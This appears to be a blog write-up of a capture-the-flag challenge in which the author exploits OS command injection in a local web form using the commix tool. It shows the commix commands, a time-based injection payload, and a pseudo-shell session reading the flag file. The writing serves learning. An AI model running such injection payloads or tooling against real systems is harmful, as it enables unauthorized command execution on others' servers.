2019 Stonecutters - The Battle of Gettysburg

Here's our latest write-up for the secret Stonecutters challenge that we've code named "The Battle of Gettysburg."

Somebody is Going to Get Parasites

For this challenge we made use of a tool that automates OS command injection.

Okay, let's get into it.

Similarly to all of the other "Any Key" challenges, I registered my SSH key with the scoring server and I was able to connect to a web server on 127.0.0.1:8080. For more information about this CTF feel free to check out this post.

The web server that loaded was a simple input field that indicated that I needed to check if a file existed and a submit button that said fire.

Naturally, I tried /etc/passwd and here's what I saw:

Hit!

When I checked for "foo", I saw a message that said "missed."
I then entered /flag.txt and got another hit.

I tried really hard to find an LFI, and I also spent some time attempting to eke out a SQL error. However, commix was the tool that won the Battle of Gettysburg.

Here's what I did.

First, I installed commix:
# git clone https://github.com/commixproject/commix.git

Next, I targeted the "f" parameter in the post request I saw while trying to find an LFI vuln.
As this was a POST request, I used the -d option. Please note that this option is for a data string to be sent through POST.

So, my command looked like this:
# python commix.py -u http://127.0.0.1:8080/index.php -d f=*
                                      __           
   ___   ___     ___ ___     ___ ___ /\_\   __  _   
 /`___\ / __`\ /' __` __`\ /' __` __`\/\ \ /\ \/'\  v2.8-dev#1
/\ \__//\ \L\ \/\ \/\ \/\ \/\ \/\ \/\ \ \ \\/>  </  
\ \____\ \____/\ \_\ \_\ \_\ \_\ \_\ \_\ \_\/\_/\_\ https://commixproject.com
 \/____/\/___/  \/_/\/_/\/_/\/_/\/_/\/_/\/_/\//\/_/ (@commixproject)

+--

Automated All-in-One OS Command Injection and Exploitation Tool
Copyright (c) 2014-2019 Anastasios Stasinopoulos (@ancst)
+--

(!) Legal disclaimer: Usage of commix for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program.


[*] Checking connection to the target URL... [ SUCCEED ]

[*] Setting the POST parameter 'f' for tests.
[*] Testing the (results-based) classic command injection technique... [ FAILED [*] Testing the (results-based) classic command injection technique... [ FAILED [*] Testing the (results-based) classic command injection technique... [ FAILED [*] Testing the (results-based) classic command injection technique... [ FAILED ]
[*] Testing the (results-based) dynamic code evaluation technique... [ FAILED ]
[*] Testing the (blind) time-based command injection technique... [ SUCCEED ]
[+] The POST parameter 'f' seems injectable via (blind) time-based command injection technique.
    [~] Payload: ;str=$(echo AVMINX);str1=$(expr length "$str");if [ 6 != $str1 ];then sleep 0;else sleep 1;fi 

[?] Do you want a Pseudo-Terminal shell? [Y/n] > Y


Pseudo-Terminal (type '?' for available options)

commix(os_shell) > ls
[*] Retrieving the length of execution output... [ SUCCEED ]
[*] Retrieved: 9
[*] Presuming the execution output, please wait... [ SUCCEED ]

indes.php


[*] Finished in 00:01:42.

commix(os_shell) > cat /flag.txt
[*] Retrieving the length of execution output... [ SUCCEED ]
[*] Retrieved: 86
[*] Presuming the execution output, please wait... [ 64.0% ]
[*] Presuming the execution output, please wait... [ SUCCEED ]

flag:{HomerSimpsonSinksHisBrothersCarDealership} https:K/wwwr`outube.com/watch?v)g65cuaqoeT0


[*] Finished in 00:36:17.


Please note, that the time stamps are in minutes. It took 36 minutes for that flag to return and I was really lucky that the flag's characters didn't get all messed up like they did in youtube URL and the output for the 'ls' command. Time based command injection attacks can be a harsh mistress.

Awesome tool though; Commix is no joke.

Thanks for reading!
@strupo_

Find us on Twitter: @teamWTG

Popular posts from this blog

A Primer for On-Site CTFs

DEF CON 27 - Our Car Hacking CTF Experience

BHIS CTF@Shmoocon 2019 - Feeling Blue?